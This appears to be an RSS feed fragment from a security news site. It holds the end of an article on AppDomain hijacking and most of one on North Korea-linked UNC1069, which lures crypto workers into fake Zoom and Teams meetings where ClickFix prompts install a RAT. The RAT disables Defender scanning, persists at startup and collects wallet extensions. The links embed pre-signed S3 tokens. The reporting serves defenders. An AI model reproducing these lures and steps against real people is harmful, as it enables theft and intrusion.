pJORJOSAbtoHm%2FNZ8zLXTgj6ovoB3%2FNv%2BymnVP3i8X0K9NNbJEu1GoE9HJkqF0rNTDn3pnPBjqZAXFOg8LStsQKbcZHrfpWriJ7N2%2FTN9ccQs%2BDf55%2BmdZQNR1GRsGlJ8MrPI5W507YVvoGwnT1%2B12AHg8rQa670yxxoMCgR9BYC30aLyWRkuy5OuWIaaiDgsyJSzpVZqHP2z6jOkIRY0CceHlILgBq6sBgn%2Bzy%2FpsflBB4MCQpY8CReMO7VcQZnE8l2rcF5946wgUfcDiQJioCKw%3D%3D&amp;Expires=1776712601" target="_blank" rel="noreferrer noopener"></a></li>



<li>Implement SSL/TLS inspection specifically for non-browser processes communicating with CDN endpoints.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/19735d0a-c6d6-4bc0-b9cf-b388ae228622/Hackers-Use-AppDomain-Hijacking-to-Turn-Trusted-Intel-Utility-Into-Malware-Launcher.pdf?AWSAccessKeyId=ASIA2F3EMEYESPMOWN4N&amp;Signature=rEnMQQFSLFgurQVcgG1ScTcWQs4%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEFsaCXVzLWVhc3QtMSJGMEQCIHGjJyWutrb8buQSwV1Tf9hMmk4zeh5CheH0BvS0wWZ4AiBz4ZfF%2F8GOrpGxhJXn7LbwHhPPk56Wpg5fNcZQ63EEayrzBAgkEAEaDDY5OTc1MzMwOTcwNSIM4mKVp5TfroQBVmc8KtAEb4Xfw6qKbAF6fdy1C1qZ0D697tRBJ9ty6USuFDmoLshqak0xZXKFuM0vmB8qqTvTziAJ3fp9gddvt7%2BqXX%2FHxFDtc4XNpYRnXj6DJky2nvuiHAPqgaymV78D3%2BHvHzV3zpOrZom7mPM7inNrp7tBmvIXGHRkpZ88%2F7vrgtEOdxcETq6Dlz6BCfgC0z3EpKQ69W6UOZcFnAdMs9uXqkxXHHspzTG1V5bEOOdcXoeFEDSAqZMahv0RLx3yE20znetf%2Bl09PcGyyrk38hdMbYkFUDa7Gp%2Fl3dem6o70AvYn9LkhCwYqFnSmalsRM6skcP87hB1CY4zzaZb9fEiEiHkgygC8mnoyALqXcYRg4lQsZZLDxErVWlRtF0HzOPaDILTuTS8RjLJhroB%2FIP%2Bl6oBTw0urlGzXl7w9%2FzmdDzZYqw0CtmkhBuITsEBZn%2BJ7b1TtZEBmr3VsJsD0KgB0PdnzDE%2Ft88IoUaQNXyRsGswLBVaIxgnkSicH6tB3etThWNCc7vKyzjf7HC3N6H%2BgSGcj803nf%2FLtShnK1KsmdA6T8DtPYi4uXxI9jhPZr4tIVrWFLTkFELIbnzu3%2BQwomWNw6VD%2BBdFzHf2Cqt8wSQUdvP%2Bj7vMoQ0kAmsQU788Vg6GIFKAc3QbFgpDcvK8unI05FlR3G9ITKREdayd2ZkuuQjpPKyIl1TGSN%2FXPQFhqDGDQJyQ5xPgE8uz4Ff9buE5ZLpJORJOSAbtoHm%2FNZ8zLXTgj6ovoB3%2FNv%2BymnVP3i8X0K9NNbJEu1GoE9HJkqF0rNTDn3pnPBjqZAXFOg8LStsQKbcZHrfpWriJ7N2%2FTN9ccQs%2BDf55%2BmdZQNR1GRsGlJ8MrPI5W507YVvoGwnT1%2B12AHg8rQa670yxxoMCgR9BYC30aLyWRkuy5OuWIaaiDgsyJSzpVZqHP2z6jOkIRY0CceHlILgBq6sBgn%2Bzy%2FpsflBB4MCQpY8CReMO7VcQZnE8l2rcF5946wgUfcDiQJioCKw%3D%3D&amp;Expires=1776712601" target="_blank" rel="noreferrer noopener"></a></li>



<li>Enable constrained execution environments to limit abuse of .NET runtime components and scripting engines.</li>
</ul>



<p class="has-text-align-center has-background" style="background:linear-gradient(180deg,rgb(238,238,238) 93%,rgb(169,184,195) 100%)"><strong>Follow us on <a href="https://news.google.com/publications/CAAqMggKIixDQklTR3dnTWFoY0tGV041WW1WeWMyVmpkWEpwZEhsdVpYZHpMbU52YlNnQVAB?hl=en-IN&amp;gl=IN&amp;ceid=IN:en" target="_blank" rel="noreferrer noopener nofollow">Google News</a>, <a href="https://www.linkedin.com/company/cybersecurity-news/" target="_blank" rel="noreferrer noopener nofollow">LinkedIn</a>, and <a href="https://x.com/cyber_press_org" target="_blank" rel="noreferrer noopener nofollow">X</a> to Get More Instant Updates</strong>, <strong>Set CSN as a Preferred Source in <a href="https://www.google.com/preferences/source?q=cybersecuritynews.com" target="_blank" rel="noreferrer noopener nofollow">Google</a>.</strong></p>
<p>The post <a href="https://cybersecuritynews.com/hackers-use-appdomain-hijacking/">Hackers Use AppDomain Hijacking to Turn Trusted Intel Utility Into Malware Launcher</a> appeared first on <a href="https://cybersecuritynews.com">Cyber Security News</a>.</p>
]]></content:encoded>
					
		
		
		<media:content url="https://cybersecuritynews.com/wp-content/uploads/2026/04/Hackers-Use-AppDomain-Hijacking-to-Turn-Trusted-Intel-Utility-Into-Malware-Launcher.webp" medium="image"></media:content>
            <post-id xmlns="com-wordpress:feed-additions:1">147985</post-id>	</item>
		<item>
		<title>North Korea-Linked UNC1069 Uses Fake Zoom and Teams Meetings to Hack Crypto Professionals</title>
		<link>https://cybersecuritynews.com/north-korea-linked-unc1069-uses-fake-zoom-and-teams-meetings/</link>
		
		<dc:creator><![CDATA[Tushar Subhra Dutta]]></dc:creator>
		<pubDate>Mon, 20 Apr 2026 18:57:48 +0000</pubDate>
				<category><![CDATA[Cyber Security News]]></category>
		<category><![CDATA[Threats]]></category>
		<category><![CDATA[cyber security]]></category>
		<category><![CDATA[cyber security news]]></category>
		<guid isPermaLink="false">https://cybersecuritynews.com/?p=147967</guid>

					<description><![CDATA[<p>A North Korean threat group known as UNC1069 has been running a sophisticated campaign that tricks cryptocurrency and Web3 professionals into joining fake online meetings, only to infect their computers with malware designed to steal digital assets. The group pretends to be venture capital firms looking for investment partnerships, building trust with targets over time [&#8230;]</p>
<p>The post <a href="https://cybersecuritynews.com/north-korea-linked-unc1069-uses-fake-zoom-and-teams-meetings/">North Korea-Linked UNC1069 Uses Fake Zoom and Teams Meetings to Hack Crypto Professionals</a> appeared first on <a href="https://cybersecuritynews.com">Cyber Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>A North Korean threat group known as UNC1069 has been running a sophisticated campaign that tricks cryptocurrency and Web3 professionals into joining fake online meetings, only to infect their computers with malware designed to steal digital assets. </p>



<p>The group pretends to be venture capital firms looking for investment partnerships, building trust with targets over time before delivering malicious payloads through counterfeit video conferencing platforms. </p>



<p>This operation is financially motivated and is believed to directly support North Korea&#8217;s missile, nuclear, and espionage programs.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/4532aa34-bf3c-4b84-b4b1-dc7b3e597672/North-Korea-Linked-UNC1069-Uses-Fake-Zoom-and-Teams-Meetings-to-Hack-Crypto-Professionals.pdf?AWSAccessKeyId=ASIA2F3EMEYEQ3HQPLKK&amp;Signature=2pXKZSPn1Ss1II2vCPUsFd4Zgog%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEFkaCXVzLWVhc3QtMSJHMEUCIQChZYcGJa65fit1kJX0eEhwOCPZ%2BQRSVsLrqcNhJFbkgAIgHOPhUkLUnKPQwSJ6f6ffFVSLs3XELXPiLwLRTTAuVaEq8wQIIhABGgw2OTk3NTMzMDk3MDUiDGHki311CfVOxjDFPyrQBPufR%2B%2BsS%2BpZxAMrUVWqHcaOFMpBfdMZIGp2pLc%2BzKrYprggAJ9M0%2B4OhVE29jiIJzlLD10YNz%2BhqxG60KhEMTFHuJU%2F90CZKSV3fvHatS3qpai8ByUzOXcx5mRoKpA54btgVh4ePPskHtAaxXRt4f9KUFsGWM%2Bx4%2FUU7c4kESjmG9pFowUKmy7Mp3kBmz0qm7gDCiMM7fyId7ocTbyC7UczHCllvfQGh70LzcmGCBOSu%2B8mw6fUYprMtDpp6LNfDqNqOg9xRQFjPFgDHV%2FQHa9a61%2BznPiw0zhWLFql4A0akyN%2BfwPWslI5vsFLCAg2L%2FzO0cP2Zng%2FyoQDIJ94kZuX4SR6Lec7ilfx%2Bqfp8%2FDhMMiEvv%2F1iiqvYk1qNt%2BtdIhH0GXf%2B%2FbY6xsqRvgFdl0faIVd%2BJHVkyXPq%2BG1yo9rwtbiphNI8SdOZ0tKBoKMDiUbEGNlBkP6Fdoyd2tl4%2BQb7E018W94Ii%2F27HVt1vigfkU61Rs5e0jNu578TriRAnKh%2F8N2l4%2B0v4btDYcLd1tuWRhsFZZMZgZfU8%2FmVslL6f6LlORHJ5ExHCun%2FC8KFnVoZX4O7Jze0ahNvx2MW9oWScnTfF%2FC7NCIVMCWw943qMNcilUDyO4%2FOvY8tSfFb19S80v8Mq0YYYmMD2ko58vWaaCpOY0bINEf3b%2B7rwo%2B37xVbq88nOJxH1bHxoSIn%2FSWD5dJ7ueOmvE3OgEZ07NoP0YV5kJQGyYWAhxh4UW0Fw6wJXwDHystZBcvaol3SvsSLzNYfg%2BbnxcwTMqBKwkw86qZzwY6mAFhukyI8XLmZz5rucSMbhnHM9avtKYCZI6GBTlcp8uRXI31Tao5F2B2Fa7GvSLMJx26inxpc7Q0IzGYEALXvoL2sI5gmFOWSAJ0O45hmBVwDEiYCTUpSPqmuCivl42ZQ80N0u5P3r7zh4Oj6TWbKCfCsFJypYM11OiFsQbFf0tnNALXe%2FNlaRwabMOfxXiKVDsVTR0C18Wdyw%3D%3D&amp;Expires=1776704496" target="_blank" rel="noreferrer noopener"></a></p>



<p>The attackers make first contact through LinkedIn and Telegram, sometimes using previously compromised accounts to appear more legitimate. </p>



<p>They then share scheduling links via Calendly to set up meetings on fake platforms that closely copy the look and feel of Zoom, Google Meet, and Microsoft Teams. </p>



<p>The fake meeting environments are convincing enough to include live participation from the attackers themselves, and in some cases, deepfake video footage of real executives is used to build trust before delivering the attack.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/4532aa34-bf3c-4b84-b4b1-dc7b3e597672/North-Korea-Linked-UNC1069-Uses-Fake-Zoom-and-Teams-Meetings-to-Hack-Crypto-Professionals.pdf?AWSAccessKeyId=ASIA2F3EMEYEQ3HQPLKK&amp;Signature=2pXKZSPn1Ss1II2vCPUsFd4Zgog%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEFkaCXVzLWVhc3QtMSJHMEUCIQChZYcGJa65fit1kJX0eEhwOCPZ%2BQRSVsLrqcNhJFbkgAIgHOPhUkLUnKPQwSJ6f6ffFVSLs3XELXPiLwLRTTAuVaEq8wQIIhABGgw2OTk3NTMzMDk3MDUiDGHki311CfVOxjDFPyrQBPufR%2B%2BsS%2BpZxAMrUVWqHcaOFMpBfdMZIGp2pLc%2BzKrYprggAJ9M0%2B4OhVE29jiIJzlLD10YNz%2BhqxG60KhEMTFHuJU%2F90CZKSV3fvHatS3qpai8ByUzOXcx5mRoKpA54btgVh4ePPskHtAaxXRt4f9KUFsGWM%2Bx4%2FUU7c4kESjmG9pFowUKmy7Mp3kBmz0qm7gDCiMM7fyId7ocTbyC7UczHCllvfQGh70LzcmGCBOSu%2B8mw6fUYprMtDpp6LNfDqNqOg9xRQFjPFgDHV%2FQHa9a61%2BznPiw0zhWLFql4A0akyN%2BfwPWslI5vsFLCAg2L%2FzO0cP2Zng%2FyoQDIJ94kZuX4SR6Lec7ilfx%2Bqfp8%2FDhMMiEvv%2F1iiqvYk1qNt%2BtdIhH0GXf%2B%2FbY6xsqRvgFdl0faIVd%2BJHVkyXPq%2BG1yo9rwtbiphNI8SdOZ0tKBoKMDiUbEGNlBkP6Fdoyd2tl4%2BQb7E018W94Ii%2F27HVt1vigfkU61Rs5e0jNu578TriRAnKh%2F8N2l4%2B0v4btDYcLd1tuWRhsFZZMZgZfU8%2FmVslL6f6LlORHJ5ExHCun%2FC8KFnVoZX4O7Jze0ahNvx2MW9oWScnTfF%2FC7NCIVMCWw943qMNcilUDyO4%2FOvY8tSfFb19S80v8Mq0YYYmMD2ko58vWaaCpOY0bINEf3b%2B7rwo%2B37xVbq88nOJxH1bHxoSIn%2FSWD5dJ7ueOmvE3OgEZ07NoP0YV5kJQGyYWAhxh4UW0Fw6wJXwDHystZBcvaol3SvsSLzNYfg%2BbnxcwTMqBKwkw86qZzwY6mAFhukyI8XLmZz5rucSMbhnHM9avtKYCZI6GBTlcp8uRXI31Tao5F2B2Fa7GvSLMJx26inxpc7Q0IzGYEALXvoL2sI5gmFOWSAJ0O45hmBVwDEiYCTUpSPqmuCivl42ZQ80N0u5P3r7zh4Oj6TWbKCfCsFJypYM11OiFsQbFf0tnNALXe%2FNlaRwabMOfxXiKVDsVTR0C18Wdyw%3D%3D&amp;Expires=1776704496" target="_blank" rel="noreferrer noopener"></a></p>



<p>Once a victim joins the <a href="https://cybersecuritynews.com/hackers-using-fake-microsoft-teams-domains-attack-via-malicious-payload/" id="146645" target="_blank" rel="noreferrer noopener">fake meeting</a>, they are told their microphone or camera is not working. The attacker creates a sense of urgency, pressuring the victim to fix the issue quickly. </p>



<p>When the victim tries to enable their audio or video, a ClickFix-style prompt appears on the screen, instructing them to copy and run a piece of code. This is the moment the malware enters the system, and from this point, the attacker has a foothold on the victim&#8217;s device.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/4532aa34-bf3c-4b84-b4b1-dc7b3e597672/North-Korea-Linked-UNC1069-Uses-Fake-Zoom-and-Teams-Meetings-to-Hack-Crypto-Professionals.pdf?AWSAccessKeyId=ASIA2F3EMEYEQ3HQPLKK&amp;Signature=2pXKZSPn1Ss1II2vCPUsFd4Zgog%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEFkaCXVzLWVhc3QtMSJHMEUCIQChZYcGJa65fit1kJX0eEhwOCPZ%2BQRSVsLrqcNhJFbkgAIgHOPhUkLUnKPQwSJ6f6ffFVSLs3XELXPiLwLRTTAuVaEq8wQIIhABGgw2OTk3NTMzMDk3MDUiDGHki311CfVOxjDFPyrQBPufR%2B%2BsS%2BpZxAMrUVWqHcaOFMpBfdMZIGp2pLc%2BzKrYprggAJ9M0%2B4OhVE29jiIJzlLD10YNz%2BhqxG60KhEMTFHuJU%2F90CZKSV3fvHatS3qpai8ByUzOXcx5mRoKpA54btgVh4ePPskHtAaxXRt4f9KUFsGWM%2Bx4%2FUU7c4kESjmG9pFowUKmy7Mp3kBmz0qm7gDCiMM7fyId7ocTbyC7UczHCllvfQGh70LzcmGCBOSu%2B8mw6fUYprMtDpp6LNfDqNqOg9xRQFjPFgDHV%2FQHa9a61%2BznPiw0zhWLFql4A0akyN%2BfwPWslI5vsFLCAg2L%2FzO0cP2Zng%2FyoQDIJ94kZuX4SR6Lec7ilfx%2Bqfp8%2FDhMMiEvv%2F1iiqvYk1qNt%2BtdIhH0GXf%2B%2FbY6xsqRvgFdl0faIVd%2BJHVkyXPq%2BG1yo9rwtbiphNI8SdOZ0tKBoKMDiUbEGNlBkP6Fdoyd2tl4%2BQb7E018W94Ii%2F27HVt1vigfkU61Rs5e0jNu578TriRAnKh%2F8N2l4%2B0v4btDYcLd1tuWRhsFZZMZgZfU8%2FmVslL6f6LlORHJ5ExHCun%2FC8KFnVoZX4O7Jze0ahNvx2MW9oWScnTfF%2FC7NCIVMCWw943qMNcilUDyO4%2FOvY8tSfFb19S80v8Mq0YYYmMD2ko58vWaaCpOY0bINEf3b%2B7rwo%2B37xVbq88nOJxH1bHxoSIn%2FSWD5dJ7ueOmvE3OgEZ07NoP0YV5kJQGyYWAhxh4UW0Fw6wJXwDHystZBcvaol3SvsSLzNYfg%2BbnxcwTMqBKwkw86qZzwY6mAFhukyI8XLmZz5rucSMbhnHM9avtKYCZI6GBTlcp8uRXI31Tao5F2B2Fa7GvSLMJx26inxpc7Q0IzGYEALXvoL2sI5gmFOWSAJ0O45hmBVwDEiYCTUpSPqmuCivl42ZQ80N0u5P3r7zh4Oj6TWbKCfCsFJypYM11OiFsQbFf0tnNALXe%2FNlaRwabMOfxXiKVDsVTR0C18Wdyw%3D%3D&amp;Expires=1776704496" target="_blank" rel="noreferrer noopener"></a></p>



<p><a href="https://www.validin.com/blog/i_cant_hear_you_unc1069/" id="https://www.validin.com/blog/i_cant_hear_you_unc1069/" target="_blank" rel="noreferrer noopener nofollow">Validin researchers identified and analyzed the full attack chain</a> in April 2026, revealing the scale and technical complexity of the campaign&#8217;s supporting infrastructure. </p>



<p>They found that payloads are built specifically for the victim&#8217;s operating system, whether Windows, macOS, or Linux, and that the malware used appears to be updated variants of Cabbage RAT, also known as CageyChameleon. </p>



<p>In addition, the research linked UNC1069 to the recent Axios NPM package compromise and noted overlaps with the Bluenoroff threat cluster previously reported by Mandiant.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/4532aa34-bf3c-4b84-b4b1-dc7b3e597672/North-Korea-Linked-UNC1069-Uses-Fake-Zoom-and-Teams-Meetings-to-Hack-Crypto-Professionals.pdf?AWSAccessKeyId=ASIA2F3EMEYEQ3HQPLKK&amp;Signature=2pXKZSPn1Ss1II2vCPUsFd4Zgog%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEFkaCXVzLWVhc3QtMSJHMEUCIQChZYcGJa65fit1kJX0eEhwOCPZ%2BQRSVsLrqcNhJFbkgAIgHOPhUkLUnKPQwSJ6f6ffFVSLs3XELXPiLwLRTTAuVaEq8wQIIhABGgw2OTk3NTMzMDk3MDUiDGHki311CfVOxjDFPyrQBPufR%2B%2BsS%2BpZxAMrUVWqHcaOFMpBfdMZIGp2pLc%2BzKrYprggAJ9M0%2B4OhVE29jiIJzlLD10YNz%2BhqxG60KhEMTFHuJU%2F90CZKSV3fvHatS3qpai8ByUzOXcx5mRoKpA54btgVh4ePPskHtAaxXRt4f9KUFsGWM%2Bx4%2FUU7c4kESjmG9pFowUKmy7Mp3kBmz0qm7gDCiMM7fyId7ocTbyC7UczHCllvfQGh70LzcmGCBOSu%2B8mw6fUYprMtDpp6LNfDqNqOg9xRQFjPFgDHV%2FQHa9a61%2BznPiw0zhWLFql4A0akyN%2BfwPWslI5vsFLCAg2L%2FzO0cP2Zng%2FyoQDIJ94kZuX4SR6Lec7ilfx%2Bqfp8%2FDhMMiEvv%2F1iiqvYk1qNt%2BtdIhH0GXf%2B%2FbY6xsqRvgFdl0faIVd%2BJHVkyXPq%2BG1yo9rwtbiphNI8SdOZ0tKBoKMDiUbEGNlBkP6Fdoyd2tl4%2BQb7E018W94Ii%2F27HVt1vigfkU61Rs5e0jNu578TriRAnKh%2F8N2l4%2B0v4btDYcLd1tuWRhsFZZMZgZfU8%2FmVslL6f6LlORHJ5ExHCun%2FC8KFnVoZX4O7Jze0ahNvx2MW9oWScnTfF%2FC7NCIVMCWw943qMNcilUDyO4%2FOvY8tSfFb19S80v8Mq0YYYmMD2ko58vWaaCpOY0bINEf3b%2B7rwo%2B37xVbq88nOJxH1bHxoSIn%2FSWD5dJ7ueOmvE3OgEZ07NoP0YV5kJQGyYWAhxh4UW0Fw6wJXwDHystZBcvaol3SvsSLzNYfg%2BbnxcwTMqBKwkw86qZzwY6mAFhukyI8XLmZz5rucSMbhnHM9avtKYCZI6GBTlcp8uRXI31Tao5F2B2Fa7GvSLMJx26inxpc7Q0IzGYEALXvoL2sI5gmFOWSAJ0O45hmBVwDEiYCTUpSPqmuCivl42ZQ80N0u5P3r7zh4Oj6TWbKCfCsFJypYM11OiFsQbFf0tnNALXe%2FNlaRwabMOfxXiKVDsVTR0C18Wdyw%3D%3D&amp;Expires=1776704496" target="_blank" rel="noreferrer noopener"></a></p>



<p>The campaign&#8217;s impact extends beyond simple system compromise. The fake meeting platforms also capture victims&#8217; audio and video in real time through the browser&#8217;s navigator.mediaDevices.getUserMedia API, streaming the data to attacker-controlled servers via WebRTC and WebSocket channels. </p>



<p>This recorded footage is then reused in later <a href="https://cybersecuritynews.com/social-engineering-tactics/" id="105131" target="_blank" rel="noreferrer noopener">social engineering</a> campaigns to impersonate real people, making future attacks even harder to detect.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/4532aa34-bf3c-4b84-b4b1-dc7b3e597672/North-Korea-Linked-UNC1069-Uses-Fake-Zoom-and-Teams-Meetings-to-Hack-Crypto-Professionals.pdf?AWSAccessKeyId=ASIA2F3EMEYEQ3HQPLKK&amp;Signature=2pXKZSPn1Ss1II2vCPUsFd4Zgog%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEFkaCXVzLWVhc3QtMSJHMEUCIQChZYcGJa65fit1kJX0eEhwOCPZ%2BQRSVsLrqcNhJFbkgAIgHOPhUkLUnKPQwSJ6f6ffFVSLs3XELXPiLwLRTTAuVaEq8wQIIhABGgw2OTk3NTMzMDk3MDUiDGHki311CfVOxjDFPyrQBPufR%2B%2BsS%2BpZxAMrUVWqHcaOFMpBfdMZIGp2pLc%2BzKrYprggAJ9M0%2B4OhVE29jiIJzlLD10YNz%2BhqxG60KhEMTFHuJU%2F90CZKSV3fvHatS3qpai8ByUzOXcx5mRoKpA54btgVh4ePPskHtAaxXRt4f9KUFsGWM%2Bx4%2FUU7c4kESjmG9pFowUKmy7Mp3kBmz0qm7gDCiMM7fyId7ocTbyC7UczHCllvfQGh70LzcmGCBOSu%2B8mw6fUYprMtDpp6LNfDqNqOg9xRQFjPFgDHV%2FQHa9a61%2BznPiw0zhWLFql4A0akyN%2BfwPWslI5vsFLCAg2L%2FzO0cP2Zng%2FyoQDIJ94kZuX4SR6Lec7ilfx%2Bqfp8%2FDhMMiEvv%2F1iiqvYk1qNt%2BtdIhH0GXf%2B%2FbY6xsqRvgFdl0faIVd%2BJHVkyXPq%2BG1yo9rwtbiphNI8SdOZ0tKBoKMDiUbEGNlBkP6Fdoyd2tl4%2BQb7E018W94Ii%2F27HVt1vigfkU61Rs5e0jNu578TriRAnKh%2F8N2l4%2B0v4btDYcLd1tuWRhsFZZMZgZfU8%2FmVslL6f6LlORHJ5ExHCun%2FC8KFnVoZX4O7Jze0ahNvx2MW9oWScnTfF%2FC7NCIVMCWw943qMNcilUDyO4%2FOvY8tSfFb19S80v8Mq0YYYmMD2ko58vWaaCpOY0bINEf3b%2B7rwo%2B37xVbq88nOJxH1bHxoSIn%2FSWD5dJ7ueOmvE3OgEZ07NoP0YV5kJQGyYWAhxh4UW0Fw6wJXwDHystZBcvaol3SvsSLzNYfg%2BbnxcwTMqBKwkw86qZzwY6mAFhukyI8XLmZz5rucSMbhnHM9avtKYCZI6GBTlcp8uRXI31Tao5F2B2Fa7GvSLMJx26inxpc7Q0IzGYEALXvoL2sI5gmFOWSAJ0O45hmBVwDEiYCTUpSPqmuCivl42ZQ80N0u5P3r7zh4Oj6TWbKCfCsFJypYM11OiFsQbFf0tnNALXe%2FNlaRwabMOfxXiKVDsVTR0C18Wdyw%3D%3D&amp;Expires=1776704496" target="_blank" rel="noreferrer noopener"></a></p>



<h2 class="wp-block-heading" id="how-the-infection-takes-hold-on-windows-systems"><strong>How the Infection Takes Hold on Windows Systems</strong></h2>



<p>On Windows machines, the ClickFix prompt instructs victims to press Win + X followed by &#8220;A&#8221; to open a terminal with administrator privileges, then paste and run a set of commands. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxW-UNhYwlPr_Xxp0f9ykcle1eeXkFw1QuzkISsOOOMLbr-S3LLzVOqm5ZulvQHo57YacStxtBuaD-FTrCswB2tu_my2tE6fWX_ye8LutVKtMbK1foE3q6msyiMKvrKZTh5OctuPObmoo9cicGbdqiacIsT3LJHBdn8FP-69possL0Ecy5hitBsoMpPDU/s16000/PowerShell%20snippet%20from%20a%20ClickFix%20lure%20for%20Windows-based%20victims%20(Source%20-%20Validin).webp" alt="PowerShell snippet from a ClickFix lure for Windows-based victims (Source - Validin)" /><figcaption class="wp-element-caption">PowerShell snippet from a ClickFix lure for Windows-based victims (Source &#8211; Validin)</figcaption></figure>
</div>


<p>These commands pull down two separate PowerShell scripts from attacker-controlled servers. The first script downloads a VBScript file, writes it to the temporary directory, and executes it twice using wscript.exe, while also adding the C:\Users directory to Windows Defender&#8217;s exclusion list and restarting the WinDefend service to suppress any alerts.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/4532aa34-bf3c-4b84-b4b1-dc7b3e597672/North-Korea-Linked-UNC1069-Uses-Fake-Zoom-and-Teams-Meetings-to-Hack-Crypto-Professionals.pdf?AWSAccessKeyId=ASIA2F3EMEYEQ3HQPLKK&amp;Signature=2pXKZSPn1Ss1II2vCPUsFd4Zgog%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEFkaCXVzLWVhc3QtMSJHMEUCIQChZYcGJa65fit1kJX0eEhwOCPZ%2BQRSVsLrqcNhJFbkgAIgHOPhUkLUnKPQwSJ6f6ffFVSLs3XELXPiLwLRTTAuVaEq8wQIIhABGgw2OTk3NTMzMDk3MDUiDGHki311CfVOxjDFPyrQBPufR%2B%2BsS%2BpZxAMrUVWqHcaOFMpBfdMZIGp2pLc%2BzKrYprggAJ9M0%2B4OhVE29jiIJzlLD10YNz%2BhqxG60KhEMTFHuJU%2F90CZKSV3fvHatS3qpai8ByUzOXcx5mRoKpA54btgVh4ePPskHtAaxXRt4f9KUFsGWM%2Bx4%2FUU7c4kESjmG9pFowUKmy7Mp3kBmz0qm7gDCiMM7fyId7ocTbyC7UczHCllvfQGh70LzcmGCBOSu%2B8mw6fUYprMtDpp6LNfDqNqOg9xRQFjPFgDHV%2FQHa9a61%2BznPiw0zhWLFql4A0akyN%2BfwPWslI5vsFLCAg2L%2FzO0cP2Zng%2FyoQDIJ94kZuX4SR6Lec7ilfx%2Bqfp8%2FDhMMiEvv%2F1iiqvYk1qNt%2BtdIhH0GXf%2B%2FbY6xsqRvgFdl0faIVd%2BJHVkyXPq%2BG1yo9rwtbiphNI8SdOZ0tKBoKMDiUbEGNlBkP6Fdoyd2tl4%2BQb7E018W94Ii%2F27HVt1vigfkU61Rs5e0jNu578TriRAnKh%2F8N2l4%2B0v4btDYcLd1tuWRhsFZZMZgZfU8%2FmVslL6f6LlORHJ5ExHCun%2FC8KFnVoZX4O7Jze0ahNvx2MW9oWScnTfF%2FC7NCIVMCWw943qMNcilUDyO4%2FOvY8tSfFb19S80v8Mq0YYYmMD2ko58vWaaCpOY0bINEf3b%2B7rwo%2B37xVbq88nOJxH1bHxoSIn%2FSWD5dJ7ueOmvE3OgEZ07NoP0YV5kJQGyYWAhxh4UW0Fw6wJXwDHystZBcvaol3SvsSLzNYfg%2BbnxcwTMqBKwkw86qZzwY6mAFhukyI8XLmZz5rucSMbhnHM9avtKYCZI6GBTlcp8uRXI31Tao5F2B2Fa7GvSLMJx26inxpc7Q0IzGYEALXvoL2sI5gmFOWSAJ0O45hmBVwDEiYCTUpSPqmuCivl42ZQ80N0u5P3r7zh4Oj6TWbKCfCsFJypYM11OiFsQbFf0tnNALXe%2FNlaRwabMOfxXiKVDsVTR0C18Wdyw%3D%3D&amp;Expires=1776704496" target="_blank" rel="noreferrer noopener"></a></p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTGUMjxe-y43zUexWkIPpvZswdmJ5MQ7LjbCMQUCWN27p43BWt0zZxSxOq-PNUCJXwFJchAcbjS2gokS7poIUk6xWkJar8izHTbvqtGdD-SFz6xuBgTLqOzDWnbFEirZPWgfpy1Utrs2MM0ITeYtcAOKiAyJcF-nNQpfh8dg78qiQtmfuBR6Acl01DYtk/s16000/Content%20of%20the%20first%20PowerShell%20payload%20for%20Windows-based%20victims%20(Source%20-%20Validin).webp" alt="Content of the first PowerShell payload for Windows-based victims (Source - Validin)" /><figcaption class="wp-element-caption">Content of the first PowerShell payload for Windows-based victims (Source &#8211; Validin)</figcaption></figure>
</div>


<p>The VBScript payload is an updated variant of Cabbage RAT that begins by collecting system details including the current username, hostname, operating system version, and installed browser extensions. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsCrZoYDaGxyfOrCc3vvC4WWel91_ATGgFRvmhVfAeIq6Vc_lwJ0gDaHcXnaewa8CGd7RGHCoMBm2CaRJrQyxJZJNYl8Q2GUgFgohNSAOfSy66CXIK-f4A78tlq0FN7hbkNZM95djTkj1mXAPlUgzSn2b9uVdNNKiqy9lLp3eSFujZypQ_VAxvOUKMVpg/s16000/Content%20of%20the%20VBS%20payload%20revealing%20collection%20of%20system%20and%20user%20details%20(Source%20-%20Validin).webp" alt="Content of the VBS payload revealing collection of system and user details (Source - Validin)" /><figcaption class="wp-element-caption">Content of the VBS payload revealing collection of system and user details (Source &#8211; Validin)</figcaption></figure>
</div>


<p>The addition of Google Chrome extension collection is a new capability clearly aimed at identifying installed <a href="https://cybersecuritynews.com/samourai-wallet-cryptocurrency-mixing-founders-jailed/" id="133910" target="_blank" rel="noreferrer noopener">cryptocurrency wallet</a> extensions. </p>



<p>A notable change in this version is the introduction of a .lnk shortcut file placed in the Windows Startup folder, ensuring the malware runs every time the user logs in. </p>



